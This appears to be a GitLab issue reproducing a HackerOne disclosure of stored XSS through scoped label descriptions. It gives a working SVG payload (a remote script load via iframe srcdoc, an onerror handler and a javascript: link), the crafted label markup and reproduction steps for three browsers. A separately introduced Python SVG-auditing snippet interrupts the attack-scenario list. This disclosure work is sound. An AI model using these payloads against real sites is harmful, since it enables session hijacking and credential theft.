Stored XSS in scoped labels

HackerOne report #1050189 by mike12 on 2020-12-03, assigned to @rchan-gitlab:

Report

Hi GitLab!

It's possible to inject arbitrary JS code into markdown using the scoped label description.

This XSS works for:

  1. gitlab.com using Firefox (tested in Firefox 83.0)
  2. A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1)
  3. A self-hosted GitLab instance without CSP using Chrome for Android (tested in Chrome for Android 86.0.4240.198)

Steps to reproduce using Firefox

  1. Open your browser and navigate to https://gitlab.com

  2. Create a new project

  3. Add a file named demo.svg to the project with the following content:

    <svg id="x"
         xmlns="http://www.w3.org/2000/svg"
         width="100"
         height="100"
    >
        <!-- gitlab.com using Firefox -->
        <foreignObject>
            <iframe xmlns="http://www.w3.org/1999/xhtml"
                    srcdoc='<script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js> </script>'></iframe>
        </foreignObject>

        <!-- A self-hosted GitLab instance without CSP using Safari -->
        <image href="foo" onerror="alert('onerror')"/>

        <!-- A self-hosted GitLab instance without CSP using Chrome for Android -->
        <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert('xlink:href')">
            <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/>
            <text x="50%" y="50%" text-anchor="middle" stroke="#000000" stroke-width="1px" dy=".3em">Click me</text>
        </a>
    </svg>
  4. Navigate to Issues > Labels

  5. Create a new scoped label

    1. Title: xss::demo
    2. Description: demo &<a>lt;svg>&<a>lt;use xlink:href="/<YOUR-USERNAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg> (Replace <YOUR-USERNAME> and <YOUR-PROJECT> with your values)
  6. Navigate to Wiki

  7. Create a new wiki page with the following content: ~"xss::demo"

  8. Open the created wiki page

  9. Hover your mouse over the label

1.png

Steps to reproduce using Safari

  1. Run a self-hosted GitLab instance
  2. Repeat steps 2 through 9 from the "Steps to reproduce using Firefox" section.

Steps to reproduce using Chrome for Android

  1. Run a self-hosted GitLab instance
  2. Repeat steps 2 through 8 from the "Steps to reproduce using Firefox" section.
  3. Tap and hold the label. A pop-up window should appear.
  4. Tap outside the pop-up window to close it.
  5. Tap on the red circle in the label tooltip.

2.mp4

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data, including credentials

Example attack scenario

  1. Create a public project
  2. Create a label in the project with the XSS payload
  3. Add the label attacker/project~"label::name" to issue comments in several public projects
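From the defensive side, as an added illustration that is not part of the report or of GitLab's own code, the following Python audits an SVG for the constructs the three vectors above rely on: active elements such as foreignObject and iframe, inline event handlers, javascript: hrefs, and use/image references that pull in another document. The sample SVGs, their placeholder URLs and the function name are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Elements that run script or embed a foreign document inside the SVG.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
# Elements that fetch and render another resource by reference.
REFERENCING_TAGS = {"use", "image", "feimage"}


def audit_svg(svg_text):
    """Return a list of findings for active or external content in an SVG;
    an empty list means nothing was flagged. A document that is not
    well-formed XML is rejected outright rather than treated as clean."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        return ["not well-formed XML; reject"]
    findings = []
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # strip the {namespace} prefix
        if tag.lower() in ACTIVE_TAGS:
            findings.append(f"active element <{tag}>")
        for name, value in elem.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()  # plain and xlink: names
            if attr.startswith("on"):  # inline handlers such as onerror
                findings.append(f"event handler {attr} on <{tag}>")
            if attr == "href":
                # Browsers ignore whitespace inside the scheme; normalise first.
                scheme = re.sub(r"\s", "", value).lower()
                if scheme.startswith("javascript:"):
                    findings.append(f"javascript: URI on <{tag}>")
                elif tag.lower() in REFERENCING_TAGS and not value.startswith("#"):
                    findings.append(f"external reference from <{tag}> to {value!r}")
    return findings


# Constructed sample mirroring the report's three vectors with placeholder values.
SAMPLE_SVG = """<svg id="x" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">
  <foreignObject><iframe xmlns="http://www.w3.org/1999/xhtml" srcdoc="placeholder"/></foreignObject>
  <image href="foo" onerror="x"/>
  <a xlink:href="javascript:void(0)"><circle cx="50" cy="50" r="40"/></a>
</svg>"""

# Constructed benign drawing: static shapes, no script, no references.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'
```

A reference such as `<use href="/user/project/-/raw/master/demo.svg#x"/>` is flagged as an external reference because the target is another document, not a fragment of the current one; treating any non-empty finding list as a reject is the conservative policy.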

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Potential Fix

#291004 (comment 460511992)

Availability and Testing

Ensure proper feature specs are added.

Edited by Désirée Chevalier